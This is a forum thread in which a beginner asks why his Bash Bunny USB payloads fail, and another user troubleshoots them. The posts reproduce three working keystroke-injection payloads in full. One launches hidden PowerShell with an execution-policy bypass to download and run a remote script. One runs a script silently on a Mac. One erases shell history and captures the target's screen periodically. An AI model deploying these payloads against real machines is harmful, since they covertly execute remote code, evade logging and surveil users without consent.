bunnybasher Posted September 14 Share Posted September 14 So I just got into computer coding and picked up my bash bunny and when I put a payload on it, it never works I put this exact payload into switch one. And my lights go green solid, then blue blink. Ive tried on 3 computers and have unmounted the bash bunny. * Title: JumpScare 2.0 * Author: I am Jakoby * Description: This is a one liner payload that will execute and wait until a mouse movement is detected. Once one is a jumpscare will be played at max volume in full screen * Target: Windows 10, 11 * -------------------------------------------------------------------------------------- * THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW. * -------------------------------------------------------------------------------------- DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -Exec Bypass $U='https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/Assets/js.zip';$Z="$env:TMP"+'\js.zip';$D="$env:TMP"+'\js';iwr -Uri $U -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;powershell $D\js.ps1 ENTER Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted September 16 Share Posted September 16 Probably failing because the author of that payload hasn't adjusted it for the Bunny. You need to QUACK things on the Bunny. Also, the payload needs to be named payload.txt to make it execute. It's all in the Bunny documentation. Quote Link to comment Share on other sites More sharing options...
bunnybasher Posted September 22 Author Share Posted September 22 I tried to use this script right off hak5 (script below), it is also named payload.txt and it is still doing the same thing. #!/bin/bash LED SETUP ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE LED ATTACK # Open terminal QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 1500 QUACK STRING "cp /Volumes/BashBunny/payloads/${SWITCH_POSITION}/rick.sh /tmp/rick.sh" QUACK ENTER QUACK DELAY 1000 QUACK STRING "diskutil eject /Volumes/BashBunny/" QUACK ENTER QUACK STRING "chmod +x /tmp/rick.sh && nohup bash /tmp/rick.sh &> /dev/null &" QUACK ENTER QUACK STRING "killall Terminal" QUACK ENTER LED FINISH Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted September 23 Share Posted September 23 I assume that you are aware that this payload will not work on Windows (you probably switched from Windows to Mac for the latest post above). If it's a Mac, I would probably try to use some other VID/PID since Apple devices most often are rather picky when it comes to what's being attached to them. GET SWITCH_POSITION is also missing which will make the use of the ${SWITCH_POSITION} variable/constant fail. 9 hours ago, bunnybasher said: I tried to use this script right off hak5 (script below) Link/source to that payload? Quote Link to comment Share on other sites More sharing options...
bunnybasher Posted September 24 Author Share Posted September 24 https://payloadhub.com/blogs/payloads/sleepymacrickhttps://payloadhub.com/blogs/payloads/sleepymacrick And I did switch but it was on my phone. Quote Link to comment Share on other sites More sharing options...
bunnybasher Posted September 24 Author Share Posted September 24 so I decided to use a windows computer and this script, which I believe is completely right. I also named the payloads text file payload.txt. and still no luck. # Title: screenGrab # Description: screenGrab payload captures snap shot's of target's screen periodically. # AUTHOR: drapl0n # Version: 1.0 # Category: Execution # Target: GNU/Linux operating systems with systemd. # Attackmodes: HID, Storage. LED SETUP ATTACKMODE STORAGE HID GET SWITCH_POSITION LED ATTACK Q DELAY 1000 Q CTRL-ALT t Q DELAY 1000 # [Prevent storing history] Q STRING unset HISTFILE Q ENTER Q DELAY 200 # [Fetching BashBunny's block device] Q STRING lol='$(lsblk | grep 1.8G)' Q ENTER Q DELAY 100 Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' Q ENTER Q DELAY 200 # [Mounting BashBunny] Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp Q ENTER Q DELAY 2000 Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' Q ENTER Q DELAY 500 # [transfering payload script] Q STRING cp -r '$mntt'/payloads/library/screenGrab/payload.sh /tmp/ Q ENTER Q STRING chmod +x /tmp/payload.sh Q ENTER Q STRING /tmp/./payload.sh Q ENTER Q DELAY 12000 Q STRING rm /tmp/payload.sh Q ENTER Q DELAY 500 # [Unmounting BashBunny] Q STRING udisksctl unmount -b /dev/'$disk' Q ENTER Q DELAY 500 Q STRING exit Q ENTER LED FINISH Quote Link to comment Share on other sites More sharing options...
dark_pyrro Posted September 25 Share Posted September 25 7 hours ago, bunnybasher said: And I did switch but it was on my phone I'm pretty sure that won't work on an iPhone 7 hours ago, bunnybasher said: so I decided to use a windows computer and this script, which I believe is completely right No, it's not right at all since the payload comments says... 7 hours ago, bunnybasher said: # Target: GNU/Linux operating systems with systemd Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.